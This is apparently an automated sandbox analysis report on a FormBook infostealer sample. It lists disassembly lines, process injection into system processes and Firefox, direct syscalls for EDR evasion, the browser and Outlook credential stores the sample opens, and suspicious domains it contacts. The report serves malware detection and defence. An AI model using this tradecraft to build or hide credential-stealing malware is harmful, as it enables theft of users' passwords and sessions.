Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A50E4 mov ecx, dword ptr fs:[00000030h] 4_2_058A50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587C0F0 mov eax, dword ptr fs:[00000030h] 4_2_0587C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C20F0 mov ecx, dword ptr fs:[00000030h] 4_2_058C20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h] 4_2_0589E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h] 4_2_0589E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h] 4_2_0589E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h] 4_2_0589E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A020 mov eax, dword ptr fs:[00000030h] 4_2_0587A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587C020 mov eax, dword ptr fs:[00000030h] 4_2_0587C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594903E mov eax, dword ptr fs:[00000030h] 4_2_0594903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594903E mov eax, dword ptr fs:[00000030h] 4_2_0594903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594903E mov eax, dword ptr fs:[00000030h] 4_2_0594903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594903E mov eax, dword ptr fs:[00000030h] 4_2_0594903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592705E mov ebx, dword ptr fs:[00000030h] 4_2_0592705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592705E mov eax, dword ptr fs:[00000030h] 4_2_0592705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05882050 mov eax, dword ptr fs:[00000030h] 4_2_05882050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AB052 mov eax, dword ptr fs:[00000030h] 4_2_058AB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05955060 mov eax, dword ptr fs:[00000030h] 4_2_05955060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov ecx, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AC073 mov eax, dword ptr fs:[00000030h] 4_2_058AC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590106E mov eax, dword ptr fs:[00000030h] 4_2_0590106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD070 mov ecx, dword ptr fs:[00000030h] 4_2_058FD070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A438F mov eax, dword ptr fs:[00000030h] 4_2_058A438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A438F mov eax, dword ptr fs:[00000030h] 4_2_058A438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595539D mov eax, dword ptr fs:[00000030h] 4_2_0595539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h] 4_2_0587E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h] 4_2_0587E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h] 4_2_0587E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05878397 mov eax, dword ptr fs:[00000030h] 4_2_05878397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05878397 mov eax, dword ptr fs:[00000030h] 4_2_05878397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05878397 mov eax, dword ptr fs:[00000030h] 4_2_05878397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D739A mov eax, dword ptr fs:[00000030h] 4_2_058D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D739A mov eax, dword ptr fs:[00000030h] 4_2_058D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B33A0 mov eax, dword ptr fs:[00000030h] 4_2_058B33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B33A0 mov eax, dword ptr fs:[00000030h] 4_2_058B33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A33A5 mov eax, dword ptr fs:[00000030h] 4_2_058A33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593B3D0 mov ecx, dword ptr fs:[00000030h] 4_2_0593B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0588A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0588A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0588A3C0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658557D00 RtlAddVectoredExceptionHandler,RaiseFailFastException, 0_2_00007FF658557D00
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585B0E9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF6585B0E9C

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and write Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQuerySystemInformation: Direct from: 0x76EF48CC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtOpenSection: Direct from: 0x76EF2E0C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQueryInformationToken: Direct from: 0x76EF2CAC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtCreateFile: Direct from: 0x76EF2FEC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtOpenFile: Direct from: 0x76EF2DCC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtTerminateThread: Direct from: 0x76EF2FCC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtOpenKeyEx: Direct from: 0x76EF2B9C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtSetInformationProcess: Direct from: 0x76EF2C5C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtCreateMutant: Direct from: 0x76EF35CC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtResumeThread: Direct from: 0x76EF36AC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtMapViewOfSection: Direct from: 0x76EF2D1C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtReadFile: Direct from: 0x76EF2ADC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtDelayExecution: Direct from: 0x76EF2DDC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQueryInformationProcess: Direct from: 0x76EF2C26 Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtResumeThread: Direct from: 0x76EF2FBC Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtCreateUserProcess: Direct from: 0x76EF371C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtWriteVirtualMemory: Direct from: 0x76EF490C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtSetInformationThread: Direct from: 0x76EE63F9 Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtSetInformationThread: Direct from: 0x76EF2B4C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtCreateKey: Direct from: 0x76EF2C6C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\findstr.exe Thread register set: target process: 5328 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\findstr.exe Thread APC queued: target process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\System32\svchost.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\System32\svchost.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 5084008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe" Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585B1544 cpuid 0_2_00007FF6585B1544
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585B11A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF6585B11A0

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467022 Sample: GJRX21GBj3.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 32 www.mg55aa.xyz 2->32 34 www.valerieomage.com 2->34 36 14 other IPs or domains 2->36 44 Snort IDS alert for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 52 3 other signatures 2->52 10 GJRX21GBj3.exe 1 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 signatures5 64 Writes to foreign memory regions 10->64 66 Allocates memory in foreign processes 10->66 68 Injects a PE file into a foreign processes 10->68 13 ngen.exe 10->13         started        16 conhost.exe 10->16         started        18 svchost.exe 10->18         started        process6 signatures7 72 Maps a DLL or memory area into another process 13->72 20 pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe 13->20 injected process8 signatures9 54 Found direct / indirect Syscall (likely to bypass EDR) 20->54 23 findstr.exe 13 20->23         started        process10 signatures11 56 Tries to steal Mail credentials 